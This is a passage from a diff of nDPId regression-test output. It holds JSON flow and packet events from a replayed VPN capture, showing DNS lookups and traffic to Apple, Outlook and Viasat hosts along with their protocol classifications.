{"query":"mail.viasat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00688{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1569687267814,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":1569687267814,"pkt":"NDY7z3UoLH6BsEqhCABFAADSAABAADoRnqJLS0tLCgAA4wA167UAvhHNhe+BgAABAAQAAAAAA3d3dwVhcHBsZQNjb20AAAEAAcAMAAUAAQAABRUAGwN3d3cFYXBwbGUDY29tB2VkZ2VrZXkDbmV0AMArAAUAAQAAFoEALwN3d3cFYXBwbGUDY29tB2VkZ2VrZXkDbmV0C2dsb2JhbHJlZGlyBmFrYWRuc8BBwFIABQABAAAE7QAZBWU2ODU4BWRzY2U5CmFrYW1haWVkZ2XAQcCNAAEAAQAAAAcABLgbc6E="} -00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":373,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267799,"flow_last_seen":1569687267814,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":106,"midstream":0,"thread_ts_msec":1569687267814,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":60341,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"www.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"184.27.115.161"}} 
+00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":373,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267799,"flow_last_seen":1569687267814,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":106,"midstream":0,"thread_ts_msec":1569687267814,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":60341,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"www.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"184.27.115.161"}} 00820{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":375,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1569687267818,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":323,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":323,"pkt_l4_len":289,"thread_ts_msec":1569687267818,"pkt":"NDY7z3UoLH6BsEqhCABFAAE1AABAADoRnj9LS0tLCgAA4wA16L4BIf0XEJCBgAABAAoAAAAACTEtY291cmllcgdzYW5kYm94BHB1c2gFYXBwbGUDY29tAAABAAHADAAFAAEAAElSAC0BMRpjb3VyaWVyLXNhbmRib3gtcHVzaC1hcHBsZQNjb20GYWthZG5zA25ldADAPgAFAAEAAACOACIUdXMtc2FuZGJveC1jb3VyaWVyLTQKcHVzaC1hcHBsZcBbwHcAAQABAAAALgAEEbyKR8B3AAEAAQAAAC4ABBG8hEjAdwABAAEAAAAuAAQRvIbKwHcAAQABAAAALgAEEbyKSMB3AAEAAQAAAC4ABBG8iLrAdwABAAEAAAAuAAQRvIU9wHcAAQABAAAALgAEEbyHusB3AAEAAQAAAC4ABBG8ikY="} 
-00815{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":375,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267800,"flow_last_seen":1569687267818,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":331,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1569687267818,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":59582,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"1-courier.sandbox.push.apple.com","num_queries":1,"num_answers":10,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.188.138.71"}} +00815{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":375,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267800,"flow_last_seen":1569687267818,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":331,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1569687267818,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":59582,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"1-courier.sandbox.push.apple.com","num_queries":1,"num_answers":10,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.188.138.71"}} 
00644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1569687267819,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":190,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":190,"pkt_l4_len":156,"thread_ts_msec":1569687267819,"pkt":"NDY7z3UoLH6BsEqhCABFAACwAABAADoRnsRLS0tLCgAA4wA1x3QAnFOt9V6BgAABAAMAAAAACTEtY291cmllcgRwdXNoBWFwcGxlA2NvbQAAAQABwAwABQABAAAYQwAlATESY291cmllci1wdXNoLWFwcGxlA2NvbQZha2FkbnMDbmV0AMA2AAUAAQAAABcAHQ91cy1zdy1jb3VyaWVyLTQKcHVzaC1hcHBsZcBLwGcAAQABAAAAFwAEETmQdA=="} -00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":377,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267799,"flow_last_seen":1569687267819,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1569687267819,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":51060,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"1-courier.push.apple.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.57.144.116"}} 
+00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":377,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267799,"flow_last_seen":1569687267819,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1569687267819,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":51060,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"1-courier.push.apple.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.57.144.116"}} 00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":378,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1569687267820,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":119,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":119,"pkt_l4_len":85,"thread_ts_msec":1569687267820,"pkt":"NDY7z3UoLH6BsEqhCABFAABp+WRAADUGn5oROZB0CgAA4xRn3jZl3bexMRy43IAYARnThAAAAQEICtWmYt0cDdFWFQMDADDYQSIj3jkYV2ViIYpeEoheM2HYhDINcbYvi9M0lKa7pHKjHCudSoLIJkInalaEjXI="} -00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":378,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267797,"flow_last_seen":1569687267820,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1569687267820,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"17.57.144.116","src_port":56886,"dst_port":5223,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":378,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267797,"flow_last_seen":1569687267820,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1569687267820,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"17.57.144.116","src_port":56886,"dst_port":5223,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":379,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1569687267820,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569687267820,"pkt":"LH6BsEqhNDY7z3UoCABFAAAoAABAAEAGjkAKAADjETmQdN42FGcxHLjcAAAAAFAEAAAmugAA"} 
00644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":382,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1569687267824,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":192,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":192,"pkt_l4_len":158,"thread_ts_msec":1569687267824,"pkt":"NDY7z3UoLH6BsEqhCABFAACyAABAADoRnsJLS0tLCgAA4wA1+sEAnlIeE96BgAABAAMAAAAACjI0LWNvdXJpZXIEcHVzaAVhcHBsZQNjb20AAAEAAcAMAAUAAQAASVMAJgIyNBJjb3VyaWVyLXB1c2gtYXBwbGUDY29tBmFrYWRucwNuZXQAwDcABQABAAAAGwAdD3VzLXN3LWNvdXJpZXItNApwdXNoLWFwcGxlwE3AaQABAAEAAAAuAAQROZAU"} -00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":382,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267805,"flow_last_seen":1569687267824,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1569687267824,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64193,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"24-courier.push.apple.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.57.144.20"}} 
+00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":382,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267805,"flow_last_seen":1569687267824,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1569687267824,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64193,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"24-courier.push.apple.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.57.144.20"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":383,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267831,"flow_last_seen":1569687267831,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1569687267831,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":49781,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":383,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1569687267831,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1569687267831,"pkt":"LH6BsEqhNDY7z3UoCABFAAA3jBMAAP8RjikKAADjS0tLS8J1ADUAI5qcqN8BAAABAAAAAAAABWFwcGxlA2NvbQAAAQAB"} 
-00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":383,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267831,"flow_last_seen":1569687267831,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1569687267831,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":49781,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":383,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267831,"flow_last_seen":1569687267831,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1569687267831,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":49781,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":384,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267841,"flow_last_seen":1569687267841,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687267841,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.103.196","src_port":56871,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1569687267841,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267841,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0KKIAAEAG11YKAADjCCVnxN4nAbsMJdDwho1uAoAR\/\/8iBAAAAQEIChwN0X94psIw"} 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":385,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1569687267847,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":117,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":117,"pkt_l4_len":83,"thread_ts_msec":1569687267847,"pkt":"NDY7z3UoLH6BsEqhCABFAABnAABAADoRnw1LS0tLCgAA4wA1wnUAU2BUqN+BgAABAAMAAAAABWFwcGxlA2NvbQAAAQABwAwAAQABAAAE+gAEEbJgO8AMAAEAAQAABPoABBGOoDvADAABAAEAAAT6AAQRrOAv"} 
-00780{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":385,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267831,"flow_last_seen":1569687267847,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1569687267847,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":49781,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"apple.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.178.96.59"}} +00780{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":385,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267831,"flow_last_seen":1569687267847,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1569687267847,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":49781,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"apple.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.178.96.59"}} 
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":386,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1569687267847,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"thread_ts_msec":1569687267847,"pkt":"NDY7z3UoLH6BsEqhCABFAABNAABAADoRnydLS0tLCgAA4wA1yxYAOeBneJ6BgAABAAEAAAAABG1haWwGdmlhc2F0A2NvbQAAAQABwAwAAQABAAAAPAAECCVnxA=="} -00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":386,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267812,"flow_last_seen":1569687267847,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1569687267847,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":51990,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"mail.viasat.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"8.37.103.196"}} +00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":386,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267812,"flow_last_seen":1569687267847,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1569687267847,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":51990,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"mail.viasat.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"8.37.103.196"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":387,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267851,"flow_last_seen":1569687267851,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1569687267851,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":58074,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":387,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1569687267851,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1569687267851,"pkt":"LH6BsEqhNDY7z3UoCABFAAA9LvsAAP8R6zsKAADjS0tLS+LaADUAKWM2zl4BAAABAAAAAAAAA3d3dwdvdXRsb29rA2NvbQAAAQAB"} -00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":387,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267851,"flow_last_seen":1569687267851,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1569687267851,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":58074,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.outlook.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":387,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267851,"flow_last_seen":1569687267851,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1569687267851,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":58074,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.outlook.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00696{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":388,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1569687267865,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":230,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":230,"pkt_l4_len":196,"thread_ts_msec":1569687267865,"pkt":"NDY7z3UoLH6BsEqhCABFAADYAABAADoRnpxLS0tLCgAA4wA14toAxJ5uzl6BgAABAAcAAAAAA3d3dwdvdXRsb29rA2NvbQAAAQABwAwABQABAAAAzQAUB291dGxvb2sJb2ZmaWNlMzY1wBjALQAFAAEAAABWABkHb3V0bG9vawdtcy1hY2RjBm9mZmljZcAYwE0ABQABAAAHZQAKB3NqYy1lZnrAVcByAAEAAQAAADAABChh3iLAcgABAAEAAAAwAAQ0YAOCwHIAAQABAAAAMAAEKGHdcsByAAEAAQAAADAABDRgEgI="} 
-00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":388,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267851,"flow_last_seen":1569687267865,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1569687267865,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":58074,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.outlook.com","num_queries":1,"num_answers":7,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"40.97.222.34"}} +00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":388,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267851,"flow_last_seen":1569687267865,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1569687267865,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":58074,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.outlook.com","num_queries":1,"num_answers":7,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"40.97.222.34"}} 
00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":389,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1569687267881,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267881,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0KOdAAPMG5BAIJWfECgAA4wG73ieGjW4CDCXQ8YAQTdZYOgAAAQEICninPiMcDdF\/"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":390,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267988,"flow_last_seen":1569687267988,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687267988,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"74.125.197.188","src_port":56874,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 